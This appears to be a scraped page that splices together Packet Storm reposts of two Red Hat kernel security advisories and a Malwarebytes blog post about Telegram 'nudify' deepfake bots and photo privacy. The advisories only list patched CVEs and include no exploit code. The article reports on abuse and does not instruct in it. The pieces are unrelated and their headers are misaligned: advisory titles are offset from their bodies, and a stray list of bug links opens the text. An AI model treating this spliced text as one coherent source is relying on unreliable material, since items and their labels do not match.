https://bugzilla.redhat.com/show_bug.cgi?id=2281149  
https://bugzilla.redhat.com/show_bug.cgi?id=2281847  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2284571  
https://bugzilla.redhat.com/show_bug.cgi?id=2293078  
https://bugzilla.redhat.com/show_bug.cgi?id=2293443  
https://bugzilla.redhat.com/show_bug.cgi?id=2295921  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297543  
https://bugzilla.redhat.com/show_bug.cgi?id=2300517

Red Hat Security Advisory 2024-8162-03

Red Hat Security Advisory 2024-8158-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8158.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:8158-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8158  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8158-03

Red Hat Security Advisory 2024-8157-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8157.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8157-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8157  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8157-03

Millions of people are turning normal pictures into nude images using bots on Telegram, and it can be done in minutes.

Millions of people are turning normal pictures into nude images, and it can be done in minutes.

Journalists at Wired found at least 50 “nudify” bots on Telegram that claim to create explicit photos or videos of people with only a couple of clicks. Combined, these bots have millions of monthly users. Although there is no sure way to find out how many unique users that are, it’s appalling, and highly likely there are much more than those they found.

The history of nonconsensual intimate image (NCII) abuse—as the use of explicit deepfakes without consent is often called—started near the end of 2017. Motherboard (now Vice) found an online video in which the face of Gal Gadot had been superimposed on an existing pornographic video to make it appear that the actress was engaged in the acts depicted. The username of the person that claimed to be responsible for this video resulted in the name “deepfake.”

Since then, deepfakes have gone through many developments. It all started with face swaps, where users put the face of one person onto the body of another person. Now, with the advancement of AI, more sophisticated methods like Generative Adversarial Networks (GANs) are available to the public.

However, most of the uncovered bots don’t use this advanced type of technology. Some of the bots on Telegram are “limited” to removing clothes from existing pictures, an extremely disturbing act for the victim.

These bots have become a lucrative source of income. The use of such a Telegram bot usually requires a certain number of “tokens” to create images. Of course, cybercriminals have also spotted opportunities in this emerging market and are operating non-functional or bots that render low-quality images.

Besides disturbing, the use of AI to generate explicit content is costly, there are no guarantees of privacy (as we saw the other day when AI Girlfriend was breached), and you can even end up getting infected with malware.

The creation and distribution of explicit nonconsensual deepfakes raises serious ethical issues around consent, privacy, and the objectification of women, let alone the creation of sexual child abuse material. Italian scientists found explicit nonconsensual deepfakes to be a new form of sexual violence, with potential long-term psychological and emotional impacts on victims.

To combat this type of sexual abuse there have been several initiatives:

*   The US has proposed legislation in the form of the Deepfake Accountability Act. Combined with the recent policy change by Telegram to hand over user details to law enforcement in cases where users are suspected of committing a crime, this could slow down the use of the bots, at least on Telegram.
*   Some platform policies (e.g. Google banned involuntary synthetic pornographic footage from search results).

However, so far these steps have shown no significant impact on the growth of the market for NCIIs.

**Keep your children safe**

We’re sometimes asked why it’s a problem to post pictures on social media that can be harvested to train AI models.

We have seen many cases where social media and other platforms have used the content of their users to train their AI. Some people have a tendency to shrug it off because they don’t see the dangers, but let us explain the possible problems.

*   Deepfakes: AI generated content, such as deepfakes, can be used to spread misinformation, damage your reputation or privacy, or defraud people you know.
*   Metadata: Users often forget that the images they upload to social media also contain metadata like, for example, where the photo was taken. This information could potentially be sold to third parties or used in ways the photographer didn’t intend.
*   Intellectual property. Never upload anything you didn’t create or own. Artists and photographers may feel their work is being exploited without proper compensation or attribution.
*   Bias: AI models trained on biased datasets can perpetuate and amplify societal biases.
*   Facial recognition: Although facial recognition is not the hot topic it once used to be, it still exists. And actions or statements done by your images (real or not) may be linked to your persona.
*   Memory: Once a picture is online, it is almost impossible to get it completely removed. It may continue to exist in caches, backups, and snapshots.

If you want to continue using social media platforms that is obviously your choice, but consider the above when uploading pictures of you, your loved ones, or even complete strangers.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#intel